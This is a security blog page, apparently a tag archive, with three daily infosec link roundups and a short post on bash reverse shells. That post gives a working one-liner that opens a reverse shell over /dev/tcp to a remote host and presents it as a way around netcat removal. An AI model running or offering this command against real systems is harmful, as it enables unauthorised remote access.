pen testing

Good afternoon everybody! I hope your day is going well.

Here are today's Interesting Information Security Bits from around the web.

  1. A nifty tool pointed too by Agusto that helps dig out those user/password pairs hanging around on shares.
    Very nice tool for pentests | Security Balance
    Tags: ( tools pentesting passwords )
  2. If you live in the UK, you want to read this short post about your health records.
    Light Blue Touchpaper >> Blog Archive >> Opting out of health data collection
    Tags: ( privacy health )
  3. OpenDNS is trying to make your DNS experience safer.
    OpenDNS Blog >> OpenDNS adopts DNSCurve
    Tags: ( dns dnssec dnscurve opendns )
  4. This looks interesting. See how well you are alerting/stopping data leakage in your org.
    Hydra: Data Leakage Vulnerability Test System | Fidelis Security Systems
    Tags: ( dlp data-leakage tools )

That's it for today. Have fun!

Subscribe to my RSS Feed if you enjoy these daily Interesting Bits posts.

Kevin

{ 0 comments }

Good afternoon everybody! I hope your day is going well.

Here are today's Interesting Information Security Bits from around the web.

  1. Adobe offers some guidance on securely deploying cross-domain policy files (Hat tip to cgisecurity.com)
    Securely deploying cross-domain policy files - ASSET
    Tags: ( adobe crossdomain )
  2. I have to agree with this post. Free isn't always best.
    MSI :: State of Security >> Beware of 'Free' InfoSec
    Tags: ( pentesting webappsec )
  3. Is this really the best use of our legislature's time?
    Security Fix - Bill would ban P2P use on federal networks, PCs
    Tags: ( law p2p )
  4. Bob is at it again. Go see what he is up to.
    Syn: Bob The Backdoor Man - Part 1
    Tags: ( story pentesting )
  5. We will likely see more of this in the future. A DNA testing firm files bankruptcy.
    DNA Testing Firm Goes Bankrupt; Who Gets the Data? | Threat Level | Wired.com
    Tags: ( privacy dna )

That's it for today. Have fun!

Subscribe to my RSS Feed if you enjoy these daily Interesting Bits posts.

Kevin

{ 0 comments }

Good afternoon everybody! I hope your day is going well.

Here are today's Interesting Information Security Bits from around the web.

  1. Andy poses the question (paraphrased) "You get to build a security program from the ground up. How do you go about it?" Go over and offer your thoughts.
    Building a security program from the ground up >> Andy ITGuy
    Tags: ( infosec-program )
  2. Want to learn how to write exploits. You should really check out Dino's exploitation class. I'll be going through it at my earliest convenience. Oh, and by the way, it's free.
    Penetration Testing and Vulnerability Analysis - Exploitation
    Tags: ( class education explolits )
  3. From the site: A group of PenTesters/Researchers have gotten together with the purpose of posting their useful scripts. Feel free to submit your scripts, we will gladly review them, even post them crediting you. You can submit them at scripts@pentesterscripting.com
    start [PenTester Scripting]
    Tags: ( pentest scripts tools )
  4. Some interesting thoughts that Richard shares from a talk given by Michael Hayden.
    TaoSecurity: Notes from Talk by Michael Hayden
    Tags: ( general )
  5. I agree with the Infosec Cynic. Allowing non-Latin characters is going to open up a whole new way for evil to be propagated.
    International Websites | The Infosec Cynic
    Tags: ( dns )
  6. If you haven't heard yet, there is a worm running around that Rick Rolls iPhones that have been jailbroken. This post isn't really about the worm, but about the individual who wrote, released and then talked about doing it.
    Worm author tells media he initially infected 100 iPhones | Graham Cluley's blog
    Tags: ( general worm iphone )
  7. A nifty use of netcat to image a drive over the network.
    How-to: Cloning a (Laptop) Hard Drive using DD over the network | Roer.com - Kai Roer's Rants on Infosec
    Tags: ( backup imaging )

That's it for today. Have fun!

Subscribe to my RSS Feed if you enjoy these daily Interesting Bits posts.

Kevin

{ 0 comments }

Bash based reverse shell wickedness

by kriggins on April 17, 2008

in Security testing, Tips, Tools

ShellNeohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc... and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins

{ 1 comment }